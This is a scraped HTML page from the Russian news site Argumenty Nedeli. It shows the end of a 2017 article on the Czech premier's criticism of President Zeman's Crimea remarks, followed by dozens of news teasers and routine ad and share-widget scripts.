<p>Ранее Милош Земан, выступая в ПАСЕ, <a href="http://argumenti.ru/politics/2017/10/551905">назвал</a> потерю Крыма Украиной завершенным делом. Земан предложил Москве выплатить Киеву компенсацию за вошедший в состав России полуостров. В Верховной Раде чешского президента после этих слов <a href="http://argumenti.ru/world/2017/10/551915">обвинили</a> в цинизме.&nbsp; &nbsp;&nbsp;</p>
<p>&nbsp;</p></div>
						
					

					
				</div>
			</article>
				<div id="publ_panel">

					<p class="er_info"><a href="javascript:void(0)" onclick="winop()">Ошибка в тексте? Пожалуйста, выделите ее и нажмите "Ctrl + Enter"</a>
					<span id="clicks" class="clicks"></span>
					

					<!--<script type="text/javascript">
						 $('#clicks').load('ar_clicks/ar_clicks.php?find=551959&date=2017-10-11');
					</script>--></p>

					<div id = "drop_sub">
						<a href="http://www.argumenti.ru/rss/argumenti_online.xml" target="_blank" rel="nofollow">RSS</a>,
						<a href="javascript:void(0);" onclick="return bookmark(this);">Избранное</a>,
						<a href="http://twitter.com/argumenti" target="_blank" rel="nofollow">Twitter</a>,
						<a href="http://www.facebook.com/pages/Argumentyru/110475665647188?ref=mf"  target="_blank" rel="nofollow">Facebook</a>,
						<a href="http://vkontakte.ru/club14409962" target="_blank" rel="nofollow">В Контакте</a>,
						<a href="http://my.mail.ru/community/argumenti" target="_blank" rel="nofollow">Мой мир</a>
					</div>

					<script type="text/javascript">
						// выпадающий список под ссылкой
						(function($) {
							$.fn.dropDownBlock = function(block, options) {
							var defaults = {
								speed: 'fast',
								top: $(this).height(),
								left: 0
							},
						opts 	= $.extend(defaults, options),
						toggler = $(this),
						block 	= $(block);
						toggler.css({'outline': 'none'})

						toggler.click(function(e) {
							e.preventDefault();
							$(block).css({
								'position' 	: 'absolute',
								'top' 		: (toggler.offset().top + opts['top']) + 'px',
								'left' 		: (toggler.offset().left + opts['left']) + 'px'
							});
						if($(block).is(':visible')) $(block).fadeOut(opts['speed']);
						else $(block).fadeIn(opts['speed']);
						this.focus();
						});
						toggler.blur(function() {
							$(block).fadeOut(opts['speed']);
						});
					};
				})(jQuery);

				$('#li_sub').dropDownBlock($('#drop_sub'));


			</script>



												<div id="initials">ДЦ</div>
									</div>


								<ul id="tags"><li>Теги:&nbsp;</li>
														<li>						<a href="http://argumenti.ru/search/%23%D0%A7%D0%B5%D1%85%D0%B8%D1%8F">Чехия</a>
					</li>
														<li>,&nbsp;						<a href="http://argumenti.ru/search/%23%D0%A1%D0%BE%D0%B1%D0%BE%D1%82%D0%BA%D0%B0">Соботка</a>
					</li>
														<li>,&nbsp;						<a href="http://argumenti.ru/search/%23%D0%BF%D1%80%D0%B5%D0%BC%D1%8C%D0%B5%D1%80-%D0%BC%D0%B8%D0%BD%D0%B8%D1%81%D1%82%D1%80">премьер-министр</a>
					</li>
														<li>,&nbsp;						<a href="http://argumenti.ru/search/%23%D0%97%D0%B5%D0%BC%D0%B0%D0%BD">Земан</a>
					</li>
														<li>,&nbsp;						<a href="http://argumenti.ru/search/%23%D0%BF%D1%80%D0%B5%D0%B7%D0%B8%D0%B4%D0%B5%D0%BD%D1%82">президент</a>
					</li>
														<li>,&nbsp;						<a href="http://argumenti.ru/search/%23%D0%9A%D1%80%D1%8B%D0%BC">Крым</a>
					</li>
						</ul><br>
	

			
		
	<script type="text/javascript">commented()</script>


	<br/>
	



<p id="comment_info">Обсудить наши публикации можно на страничках «АН» в <a href="http://facebook.com/argumentinedeli" target="_blank" rel="nofollow">Facebook</a> и <a href="http://vk.com/club14409962" target="_blank" rel="nofollow">ВКонтакте</a></p>

<script type="text/javascript">(function() {
  if (window.pluso)if (typeof window.pluso.start == "function") return;
  if (window.ifpluso==undefined) { window.ifpluso = 1;
    var d = document, s = d.createElement('script'), g = 'getElementsByTagName';
    s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
    s.src = ('https:' == window.location.protocol ? 'https' : 'http')  + '://share.pluso.ru/pluso-like.js';
    var h=d[g]('body')[0];
    h.appendChild(s);
  }})();</script>
<div class="pluso" data-background="none;" data-options="medium,square,line,horizontal,counter,sepcounter=1,theme=14" data-services="vkontakte,odnoklassniki,facebook,twitter,moimir"></div>

<p class="namerub"><span class="rem">//</span>Подписаться на рассылку эксклюзива от АН</p>
	<noindex>
		<iframe src="http://mailing.argumenti.ru/" style="width:97%; border: none;padding: 0px;">
	    	Ваш браузер не поддерживает плавающие фреймы!
		 </iframe>
	 </noindex>

		
	<div id="unit_83639"><a href="http://advert.mirtesen.ru/" rel="nofollow">Новости advert.mirtesen.ru</a></div>
<script type="text/javascript" charset="utf-8">
(function() {
var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
sc.src = '//js.advert.mirtesen.ru/data/js/83639.js'; sc.charset = 'utf-8';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
}());
</script>




			<div class="mainrub">
		<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>
	



	<img src="http://argumenti.ru/images/preview/arhnews/104802d108bedaf76f41f8f986132def.jpg" alt="Украина готовит против России крупный иск по Донбассу" />
	
<p class="maxititle"><a href="http://argumenti.ru/politics/2017/09/550313">Украина готовит против России крупный иск по Донбассу</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/09/550313">Украина завершает подготовку большого иска, который будет подан в Международный суд в ООН против России из-за ситуации в Донбассе, заявил министр юстиции Украины Павел Петренко.
</a></div>	</div>
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/economics">Экономика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/c71f77736de643b61d75487bc8f67dab.jpg" alt="Путин: регулирование криптовалют должно защитить граждан и бизнес" />
	

<p class="minititle"><a href="http://argumenti.ru/economics/2017/10/551931">Путин: регулирование криптовалют должно защитить граждан и бизнес</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/economics/2017/10/551931">Владимир Путин провел совещание по криптовалютам, на котором отметил, что криптовалюты набирают популярность в мире, становясь полноценным платежным средством. Необходимо выстроить их регулирование.
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/129300f11ce4ec17ba391c95bc2542b1.jpg" alt="Венгрия потребует пересмотреть соглашение об ассоциации Украины с Евросоюзом" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551857">Венгрия потребует пересмотреть соглашение об ассоциации Украины с Евросоюзом</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551857">Необходимость внесения правок в документ глава МИД Венгрии объяснил принятием украинскими властями нового закона об образовании. В Будапеште считают, что данный правовой акт ущемляет права венгров. </a></div>		</div>
	</div>
	<div id="unit_83639"><a href="http://advert.mirtesen.ru/" rel="nofollow">Новости advert.mirtesen.ru</a></div>
<script type="text/javascript" charset="utf-8">
(function() {
var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
sc.src = '//js.advert.mirtesen.ru/data/js/83639.js'; sc.charset = 'utf-8';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
}());
</script>

<br><br>	<h2 class="namerub"><span class="rem">//</span>Новости Гнездо.ру</h2>
<!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_14115">Загрузка...</div>
<script language='JavaScript'>
var s = document.createElement("script"),
f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
s.type = "text/javascript";
s.async = true;
s.src = '//news.2xclick.ru/show/14115/block_a.js';
if (window.opera == "[object Opera]") {
document.addEventListener("DOMContentLoaded", f);
} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/92cb1ec7d3600c9e6631f18bea96510c.jpg" alt="Власти Испании отказались признать независимость Каталонии" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551960">Власти Испании отказались признать независимость Каталонии</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551960">Данное заявление стало ответом испанского правительства на подписание в Каталонии декларации о независимости, за которую высказались участники плебисцита, состоявшегося в автономии 1 октября. </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/685c8276e8d713a5085abedd9d665ae0.jpg" alt="Штаб АТО объяснил задержание украинского военнослужащего на границе с Россией" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551962">Штаб АТО объяснил задержание украинского военнослужащего на границе с Россией</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551962">Об этом происшествии «Аргументы недели» писали накануне. Российские пограничники задержали военнослужащего Вооруженных сил Украины, который пытался незаконно пересечь границу РФ на Луганском направлении.</a></div>		</div>
	</div>
<!-- заввершающая линия -->
	<div class="publ_line">
		<div class="publ_line_lend">
		</div>
		<div class="publ_line_rend">
		</div>
	</div>


		<h2 class="namerub"><span class="rem">//</span>Новости ADWILE</h2>
<div id="smi_teaser_10213">
<center><a href="http://partner.adwile.com" rel="nofollow">Нативная реклама ADWILE</a></center>
</div>
<script type="text/JavaScript" encoding="utf8">
 (function() {
 var sm = document.createElement("script");
 sm.type = "text/javascript";
 sm.async = true;
 sm.src = "//jsn.24smi.net/4/c/10213.js";
 var s = document.getElementsByTagName("script")[0];
 s.parentNode.insertBefore(sm, s);})();
</script>
	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/6c7965e4cf59f3d6d2bcdc375b4b0a8c.jpeg" alt="Готовность Крымского моста оценивается в 40-45 процентов" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/10/551967">Готовность Крымского моста оценивается в 40-45 процентов</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/10/551967">Строительство Крымского моста в настоящий момент завершено на 40-45 процентов. Данную информацию в среду, 11 октября, предоставил заместитель начальника заказчика проекта ФКУ Упрдор "Тамань".</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/rassledovanie">Расследования</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/e863829b36ab8e42f1e20c8928c65da3.jpg" alt="Семья &quot;пьяного мальчика&quot; заявила иск к обвиняемой на 10 млн руб" />
	

<p class="minititle"><a href="http://argumenti.ru/rassledovanie/2017/10/551939">Семья &quot;пьяного мальчика&quot; заявила иск к обвиняемой на 10 млн руб</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/rassledovanie/2017/10/551939">Семья шестилетнего мальчика из подмосковной Балашихи, которого насмерть сбила автоледи, заявила иск к обвиняемой Ольге Алисовой на общую сумму более 10 миллионов рублей.</a></div>		</div>
	</div>
	
<div id="yandex_under_article" style="margin:0 auto"></div>
<script type="text/javascript">
if (window.matchMedia("only screen and (max-device-width: 100px)").matches){document.getElementById("yandex_under_article").style.width = "100px";var m= 2; ty="posterVertical"}
else if (window.matchMedia("only screen and (min-device-width: 100px)").matches){var m= 2; ty="vertical"}
(function(w, d, n, s, t) {
   w[n] = w[n] || [];
   w[n].push(function() {
       Ya.Direct.insertInto(50615, "yandex_under_article", {
           ad_format: "direct",
           font_size: 0.8,
           type: "horizontal",
           limit: 2,
           title_font_size: 1,
           links_underline: false,
           site_bg_color: "E7E7E7",
           bg_color: "E7E7E7",
           header_bg_color: "FFFFFF",
           border_color: "FFFFFF",
           title_color: "673366",
           url_color: "333333",
           text_color: "000000",
           hover_color: "0066FF",
           sitelinks_color: "0000CC",
           favicon: true,
           no_sitelinks: true
       });
   });
   t = d.getElementsByTagName("script")[0];
   s = d.createElement("script");
   s.src = "//an.yandex.ru/system/context.js";
   s.type = "text/javascript";
   s.async = true;
   t.parentNode.insertBefore(s, t);
})(window, document, "yandex_context_callbacks");
</script>  

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/science">Наука</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/bd0a331a3497258fa782a36b43328009.jpg" alt="Найдена невидимая половина вселенной" />
	

<p class="minititle"><a href="http://argumenti.ru/science/2017/10/551969">Найдена невидимая половина вселенной</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/science/2017/10/551969">Международная группа ученых нашла 50% видимого вещества во Вселенной, которое считалось пропавшим. Материя оказалась плотно упакована между галактиками и галактическими скоплениями (кластерами). </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/b5ae02cb18a79daa1118297da1276523.jpeg" alt="В базу данных украинского сайта &quot;Миротворец&quot; попала артистка Надежда Бабкина" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551972">В базу данных украинского сайта &quot;Миротворец&quot; попала артистка Надежда Бабкина</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551972">Знаменитая российская певица Надежда Бабкина попала в базу данных украинского сайта "Миротворец". Согласно последней информации, в черном списке известная артистка оказалась из-за посещения Крыма.</a></div>		</div>
	</div>
	
<p class="namerub"><span class="rem">//</span>Новости партнеров</p>
<div id="smi_teaser_3101">
    <center><a href="http://24smi.info" rel="nofollow">Агрегатор новостей 24СМИ</a></center>
</div>
<script type="text/JavaScript" encoding="utf8">
                (function() {
                var sm = document.createElement("script");
                sm.type = "text/javascript";
                sm.async = true;
                sm.src = "//jsn.24smi.net/6/2/3101.js";
                var s = document.getElementsByTagName("script")[0];
                s.parentNode.insertBefore(sm, s);})();</script>
            
<hr>
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/de693838e8bef1102de6f03dcdac0e3f.jpeg" alt="Жириновский хочет помериться IQ с Трампом и Тиллерсоном" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2017/10/551978">Жириновский хочет помериться IQ с Трампом и Тиллерсоном</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/10/551978">Российский политик, лидер партии ЛДПР Владимир Жириновский готов помериться коэффициентом своего интеллекта с президентом США Дональдом Трампом и американским госсекретарем Рексом Тиллерсоном.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/4c824d5b3446a5e403e6628cdb5ea3f4.jpeg" alt="В МИД России высказались о возможности введения санкций в отношении Ирана" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2017/10/551976">В МИД России высказались о возможности введения санкций в отношении Ирана</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/10/551976">В МИД России прокомментировали последствия, которые может иметь возможный выход США из соглашения по ядерной программе Ирана. Данное действие может поставить под вопрос реализацию данного проекта.</a></div>		</div>
	</div>

		

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/c8ff7238eff6b4fa0bce04f23157f85e.jpg" alt="Недовольная украинским законом об образовании Венгрия пригрозила Киеву санкциями" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551974">Недовольная украинским законом об образовании Венгрия пригрозила Киеву санкциями</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551974">Закон «Об образовании», принятый недавно Киевом, предполагает ограничение обучения на языках национальных меньшинств. В Будапеште считают, что правовой акт нарушает права венгров, проживающих на Украине. </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/incident">Происшествия</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/9ca2716ff5db8d8328b81f4833cd0a11.jpg" alt="Более миллиона долларов похитили из банковской ячейки в центре Москвы" />
	

<p class="minititle"><a href="http://argumenti.ru/incident/2017/10/551975">Более миллиона долларов похитили из банковской ячейки в центре Москвы</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/incident/2017/10/551975">Более миллиона долларов похитили накануне из банковской ячейки в центре Москвы. Согласно последней информации, к сотрудникам правоохранительных органов в минувший вторник обратился мужчина.</a></div>		</div>
	</div>


	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/250d424ff76ce16193329b1808d6a69d.jpg" alt="Норвежские народные дипломаты собрались убедить Запад признать российский Крым" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2017/10/551971">Норвежские народные дипломаты собрались убедить Запад признать российский Крым</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/10/551971">Полуостров вошел в состав РФ весной 2014 года. Ранее в среду «Аргументы недели» писали, что депутат Верховной Рады Надежда Савченко допустила силовой вариант возвращения Крыма под контроль Киева.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/026801f29a17ae9ba10cf37b29ca89ab.jpg" alt="Актер Михаил Ефремов отказался сниматься в Крыму" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/10/551973">Актер Михаил Ефремов отказался сниматься в Крыму</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/10/551973">Заявление актера и режиссера, заслуженного артиста РФ Михаила ЕФРЕМОВА о вероятном отказе от съемок в Крыму вызвало шквал обсуждений в интернете.</a></div>		</div>
	</div>




	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/showbiz">Шоу-бизнес</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/eab71e0c78a3a52c39cb7cd1272aa972.jpeg" alt="Ольга Бузова оскорбила своих обидчиков" />
	

<p class="minititle"><a href="http://argumenti.ru/showbiz/2017/10/551970">Ольга Бузова оскорбила своих обидчиков</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/showbiz/2017/10/551970">Телеведущая и певица Ольга Бузова жестко высказалась в адрес своих обидчиков. По мнению знаменитости, в настоящий момент в шоу-бизнесе любой, кто хочет "засветиться", пытается нанести ей оскорбление.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/cd4c999d69fd3d1dff0621db7fff02ea.jpg" alt="СМИ узнали причину гибели Су-24 в Сирии" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551968">СМИ узнали причину гибели Су-24 в Сирии</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551968">В СМИ появилась информация о том, что послужило причиной аварии Су-24 в Сирии, закончившейся разрушением фронтового бомбардировщика и гибелью экипажа. Инцидент на авиабазе Хмеймим произошел в минувший вторник.</a></div>		</div>
	</div>

	<!-- заввершающая линия -->
	<div class="publ_line">
		<div class="publ_line_lend">
		</div>
		<div class="publ_line_rend">
		</div>
	</div>


	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/ac52fd28f8cf40f6f4200a80ae77afd1.jpeg" alt="Подозреваемая в убийстве брата Ким Чен Ына &quot;тренировалась&quot; на другом мужчине" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551966">Подозреваемая в убийстве брата Ким Чен Ына &quot;тренировалась&quot; на другом мужчине</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551966">Подозреваемая в убийстве брата лидера КНДР Ким Чен Ына "отрабатывала" нападение на другом человеке. Согласно последней информации, "тренировка" прошла за два дня до трагической смерти Ким Чен Нама.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/crime">Криминал</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/652aa3a17b1b63e008dcceec8e764992.jpg" alt="ФСБ задержала в Крыму участников запрещенной в РФ террористической группировки" />
	

<p class="minititle"><a href="http://argumenti.ru/crime/2017/10/551965">ФСБ задержала в Крыму участников запрещенной в РФ террористической группировки</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/crime/2017/10/551965">В информации, распространенной ведомством, говорится о том, что экстремисты действовали на территории Бахчисарайского района Республики Крым. В отношении шести задержанных были возбуждены уголовные дела.</a></div>		</div>
	</div>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/e6632f155da756f16cb4649b2900549b.jpg" alt="Савченко допустила силовой вариант возвращения Крыма под контроль Украины" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551964">Савченко допустила силовой вариант возвращения Крыма под контроль Украины</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551964">Кроме того, депутат отметила, что нужно заставить мировое сообщество относиться к Крыму так же, как и к Донбассу. Для этого, по мнению Надежды Савченко, необходимо лишить Крым статуса автономной республики.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/d008f0b48244f3cf2de3130f894e3307.jpg" alt="Премьер-министр Чехии раскритиковал заявление Земана о Крыме" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551959">Премьер-министр Чехии раскритиковал заявление Земана о Крыме</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551959">Ранее чешский президент Милош Земан, выступая в ПАСЕ, назвал потерю Крыма Украиной завершенным делом. Земан предложил Москве выплатить Киеву компенсацию за вошедший в состав России полуостров. </a></div>		</div>
	</div>


	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/culture">Культура</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/43375be7ccd05040336f515eb421d3d0.jpg" alt="Сообщение о смерти Хворостовского опровергли в окружении певца" />
	

<p class="minititle"><a href="http://argumenti.ru/culture/2017/10/551958">Сообщение о смерти Хворостовского опровергли в окружении певца</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/culture/2017/10/551958">Ранее о кончине певца Дмитрия Хворостовского в социальных сетях сообщила Елена Мизулина. Через некоторое время член Совета Федерации удалила данную информацию, пояснив, что ее ввели в заблуждение СМИ.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/ce1f531ecc130de3f13b5b2fc9f4aea1.jpg" alt="ЕСПЧ обязал РФ выплатить 285 тысяч евро родственникам погибших в 2000 г. в Чечне" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/10/551957">ЕСПЧ обязал РФ выплатить 285 тысяч евро родственникам погибших в 2000 г. в Чечне</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/10/551957">Европейский суд по правам человека (ЕСПЧ) обязал Россию выплатить 285 тысяч евро родственникам погибших в 2000 году в Чечне. Истцами выступили 20 человек, большинство из которых живут в Чечне. </a></div>		</div>
	</div>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/crime">Криминал</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/c0be52ae3c4d9df38cffe45f98d7fd9b.png" alt="Суд продлил арест сыну актера &quot;Интерны&quot;, избившему блогера в Парке Горького" />
	

<p class="minititle"><a href="http://argumenti.ru/crime/2017/10/551955">Суд продлил арест сыну актера &quot;Интерны&quot;, избившему блогера в Парке Горького</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/crime/2017/10/551955">Хамовнический суд Москвы продлил срок ареста обвиняемому в умышленном причинении вреда здоровью, повлекшему смерть петербургского блогера Станислава Думкина, Корнею Макарову до 13 ноября.
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/cae267f89b2e6df85f4752b2df6ad85f.jpg" alt="Поклонская обратилась в Генпрокуратуру с двумя просьбами" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/10/551956">Поклонская обратилась в Генпрокуратуру с двумя просьбами</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/10/551956">Наталья Поклонская обратилась в Генпрокуратуру с двумя просьбами: принять меры для запрета деятельности организации "Христианское государство" и отозвать прокатное удостоверение на фильм "Матильда".</a></div>		</div>
	</div>	

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/sport">Спорт</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/a712ad8639ffb93ecf63b9426cfad69b.png" alt="Порошенко высказался о поражении Украины и невыходе на ЧМ-2018 в России" />
	

<p class="minititle"><a href="http://argumenti.ru/sport/2017/10/551954">Порошенко высказался о поражении Украины и невыходе на ЧМ-2018 в России</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/sport/2017/10/551954">Сборная Украины по футболу пропустит чемпионат мира, который в 2018 году пройдет в России. Команда Андрея Шевченко в заключительном матче отборочного турнира к ЧМ-2018 проиграла сборной Хорватии. </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/science">Наука</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/ecc914e87a1a509df74c50ce3ce30271.jpg" alt="Назван лучший способ распознавать эмоции собеседника" />
	

<p class="minititle"><a href="http://argumenti.ru/science/2017/10/551953">Назван лучший способ распознавать эмоции собеседника</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/science/2017/10/551953">Ученые в Йельском университете (США) пришли к выводу, что человек лучше распознает эмоции на слух. Оказывается, одновременно воспринимать окрас голоса человека и его мимику мы не можем. 
</a></div>		</div>
	</div>	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/showbiz">Шоу-бизнес</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/aab141a63f8a3323aae6a0667645f80c.jpg" alt="Две звезды Голливуда рассказали о домогательствах продюсера Вайнштейна" />
	

<p class="minititle"><a href="http://argumenti.ru/showbiz/2017/10/551952">Две звезды Голливуда рассказали о домогательствах продюсера Вайнштейна</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/showbiz/2017/10/551952">Две известные голливудстве актрисы Анджелина Джоли и Гвинет Пэлтроу рассказали о домогательствах  кинопродюсера Харви Вайнштейн. Признания звезд Голливуда  опубликовала  The New York Times. </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/c649d9fa868a6e08bde0d88b7262d616.jpg" alt="Полиция использовала слезоточивый газ на демонстрации профсоюзов в Париже" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551951">Полиция использовала слезоточивый газ на демонстрации профсоюзов в Париже</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551951">Около 400 тыс. человек приняли участие во вторник в акциях протеста против реформы трудового кодекса во Франции. Об этом заявили во Всеобщей конфедерации труда (ВКТ). Не работают школы и детские сады, бастуют врачи.





</a></div>		</div>
	</div>	

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/science">Наука</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/6c80fc0f1169de3e9f4f05357684c79c.jpg" alt="Российские биотехнологи   разработали  вакциону против гриппа" />
	

<p class="minititle"><a href="http://argumenti.ru/science/2017/10/551950">Российские биотехнологи   разработали  вакциону против гриппа</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/science/2017/10/551950">Российские биотехнологи разработали новую вакцину против гриппа. Медики предполагают, что в этом году активны будут четыре штамма гриппа: два типа А и  два — типа Б. </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/a1bad6a1b3fa499c116da851b1cb0e17.jpg" alt="Глава Каталонии призвал приостановить провозглашение независимости" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2017/10/551949">Глава Каталонии призвал приостановить провозглашение независимости</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/10/551949">На выступлении в региональном парламенте глава правительства Каталонии Карлес Пучдемон призвал отложить провозглашение независимости от Испании. По его словам, Барселоне и Мадриду требуется «много недель диалога».

</a></div>		</div>
	</div>	

	<div class="rub_columns">
